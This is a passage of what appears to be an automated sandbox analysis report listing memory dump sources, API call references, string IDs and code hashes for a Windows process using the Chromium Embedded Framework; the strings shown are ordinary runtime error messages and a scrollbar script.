                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0B3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0CF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0DF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0EF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC9973
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC998F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC999F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC99AF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC99BC
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC98F3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC990F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC991F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC992F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC993C
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C43
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C5F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C6F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C7F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C8C
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C63
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C7F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C8F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C9F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7CAC
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15A3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15BC
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15CC
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15DC
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA623
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA63F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA64F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA65F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA66C
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB4403
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB441B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB442B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB443B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB4448
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD927A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD928F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD929F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92AF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92BC
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD92EA
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD92FF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD930F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD931F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD932C
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@$cef_string_map_alloc
                                                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                                                            • API String ID: 1597692744-3788999226
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B1488B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort
                                                                                                                                                                            • String ID: $csm$csm
                                                                                                                                                                            • API String ID: 4206212132-1512788406
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B145DB
                                                                                                                                                                            • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFBC1B145EB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                            • API String ID: 4108983575-3733052814
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CreateFrameInfo__except_validate_context_record
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 444109036-1018135373
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B3D5CD), ref: 00007FFBC1B39F14
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FFBC1B3D5CD), ref: 00007FFBC1B39F52
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B3D5CD), ref: 00007FFBC1B39F5C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: ios_base::failbit set
                                                                                                                                                                            • API String ID: 2665656946-3924258884
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                            • API String ID: 1333004437-2891890143
                                                                                                                                                                            APIs
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DA0
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DB2
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45E3B
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$freemallocmemcpy
                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                            • API String ID: 1663771476-1405518554
                                                                                                                                                                            • Opcode ID: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                                                                                            • Instruction ID: 062fe4ca4d5a00a370cf4016fe6fa28eb8d695dd4f9dbfb94eaa6ecf2d496b38
                                                                                                                                                                            • Opcode Fuzzy Hash: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                                                                                            • Instruction Fuzzy Hash: CE31C9AAE08E8197FB548F35E9440BB67519F44FC0F48E036DA8E77759DE2CD8428B40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID: ContentSizeUpdate$scene
                                                                                                                                                                            • API String ID: 3041573648-1460969042
                                                                                                                                                                            • Opcode ID: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction ID: c768404ecc3d8f14d9ee735d730d065ef3bcfa388028b52f8272e433fc889ddd
                                                                                                                                                                            • Opcode Fuzzy Hash: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction Fuzzy Hash: 0931A663709A8281EE20EB28E490269E7B1FFC5B94F949531E78D47AB9DF3CC545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$strcmp
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 62325521-612978255
                                                                                                                                                                            • Opcode ID: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                                                                                            • Instruction ID: 5215c2e09c90479a92f22f23b60f369b5e2c501b4edfc692434bf64de612c31b
                                                                                                                                                                            • Opcode Fuzzy Hash: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 85314D62A09B8282DE20DF25E440169A7B1FF54FD4B888036EF8D47768DF38D55A8350
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFCED30: cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEDF0
                                                                                                                                                                              • Part of subcall function 00007FF79CFCED30: cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEE28
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCECD0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCED08
                                                                                                                                                                            Strings
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,, xrefs: 00007FF79CFCEC1F
                                                                                                                                                                            • scene/custom-scrollbars, xrefs: 00007FF79CFCEC31
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                                                                                            • String ID: scene/custom-scrollbars$var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,
                                                                                                                                                                            • API String ID: 2776152272-265620315
                                                                                                                                                                            • Opcode ID: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                                                                                            • Instruction ID: 2a7983837dd1e7777fe70579cf0d859e6dcd3b23c5b987d3e8443fcc5fd6b83f
                                                                                                                                                                            • Opcode Fuzzy Hash: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                                                                                            • Instruction Fuzzy Hash: A9317E23A0DA8391EE20EB28E490379A7B1FFC5794F948535E68D436A9DF3CD545CB20
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEDF0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEE28
                                                                                                                                                                            Strings
